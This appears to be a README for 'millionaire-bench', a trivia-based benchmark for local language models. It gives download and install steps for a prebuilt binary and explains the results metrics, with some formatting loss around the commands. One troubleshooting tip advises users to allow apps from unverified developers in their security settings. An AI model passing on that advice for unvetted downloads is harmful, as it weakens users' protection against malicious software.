Welcome to the millionaire-bench project! This application allows you to test the performance of your local language models using fun questions from the popular game show "Who Wants to Be a Millionaire." It's designed for users who want a simple way to benchmark their models without needing any programming skills.
To get started, you need to download the application. You can find the latest release on our GitHub Releases page.
- Click on the button above or visit the following link to download: millionaire-bench Releases.
- On the Releases page, you will see different versions of the software. Look for the most recent one.
- Find the appropriate file for your operating system (Windows, Mac, Linux). Click to download.
Before you install the application, make sure your system meets these requirements:
- Operating System: Windows 10/11, macOS 10.14 or higher, Linux (recent versions)
- RAM: At least 4GB
- Processor: Intel i3 or equivalent
- Disk Space: 100MB free space
Once you have downloaded the file, follow these steps to run the application:
- Locate the downloaded file, usually in your "Downloads" folder.
- Double-click on the .exe file to start the installation process.
- Follow the prompts to complete the installation.
- After installation, you will find the "millionaire-bench" icon on your desktop. Double-click it to run.
- Find the downloaded .dmg file in your "Downloads" folder.
- Double-click to open it.
- Drag the "millionaire-bench" icon to your "Applications" folder.
- Open "Applications" and double-click "millionaire-bench" to run.
- Open a terminal window.
- Navigate to your "Downloads" folder using the
cd ~/Downloadscommand. - Make the downloaded file executable by running:
chmod +x millionaire-bench - Run the application with:
./millionaire-bench
Once you run the application, you'll see a simple interface. Hereβs how to get started with benchmarking your model:
- Load Your Model: Click on "Load Model" and select the language model you want to benchmark.
- Select Category: Choose a category of questions inspired by "Who Wants to Be a Millionaire." You can select from trivia, culture, or science.
- Start Benchmarking: Click the "Start Benchmark" button. The application will generate questions, and your model will respond. After completion, you will see a report detailing performance metrics such as response time and accuracy.
The application will provide you with a set of results once you finish the benchmarking. Hereβs what to look for:
- Response Time: This shows how quickly your model answered each question, usually measured in seconds.
- Accuracy: It shows how many questions your model answered correctly versus total questions asked.
- Overall Score: This combines response time and accuracy to give a single score, helping you compare performance.
If you encounter any issues while using the application, here are some common troubleshooting tips:
- Application Won't Open: Ensure your system meets the necessary requirements. Sometimes, your operating system may block applications from unverified developers. Check your security settings and allow the application.
- Performance Issues: If your model is slow or unresponsive, it may require more resources. Try closing other applications to free up memory.
- Question Generation Errors: Restart the application if it fails to generate questions. Make sure your model is correctly loaded.
If you need further assistance, please reach out through the Issues page on our GitHub repository. We are here to help you.
Thank you for using millionaire-bench! Happy benchmarking!